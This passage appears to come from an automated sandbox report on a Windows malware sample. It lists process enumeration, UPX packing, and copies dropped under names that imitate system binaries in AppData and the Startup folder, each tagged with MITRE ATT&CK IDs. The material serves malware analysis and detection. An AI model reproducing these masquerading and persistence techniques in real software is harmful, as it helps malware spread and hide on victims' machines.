\"4\"\n \"th32ProcessID\": \"0\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"356\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"396\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"404\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"460\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"496\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"520\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"620\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"696\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"784\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"828\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"868\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"900\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1128\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1268\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1300\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1500\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1584\"}\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1628\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" opened \"\\Device\\KsecDD\"\n \"4k51k4.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434\" has an entrypoint in section \"UPX1\"\n \"services.exe\" has an entrypoint in section \"UPX1\"\n \"shell.exe\" has an entrypoint in section \"UPX1\"\n \"4k51k4.exe\" has an entrypoint in section \"UPX1\"\n \"New Folder.exe\" has an entrypoint in section \"UPX1\"\n \"Data HAPUBWS.exe\" has an entrypoint in section \"UPX1\"\n \"Empty.pif\" has an entrypoint in section \"UPX1\"\n \"WINLOGON.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C450.bin\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"SERVICES.EXE\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C452.bin\" has an entrypoint in section \"UPX1\"\n \"LSASS.EXE\" has an entrypoint in section \"UPX1\"\n \"MrHelloween.scr\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C88D.bin\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C740.bin\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C743.bin\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46983 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46963 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46822 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46778 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46884 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46812 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46734 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46735 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46795 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 47028 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46880 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46814 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46830 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46802 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46767 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46754 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46880 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46820 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46891 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46824 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46805 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46768 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46861 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46883 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46788 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46947 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 47028 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46839 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 46821 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46775 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46931 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46864 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46809 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46869 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46805 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46834 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46913 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 47000 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46758 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46938 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46952 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46734 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46759 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46852 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47038 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n 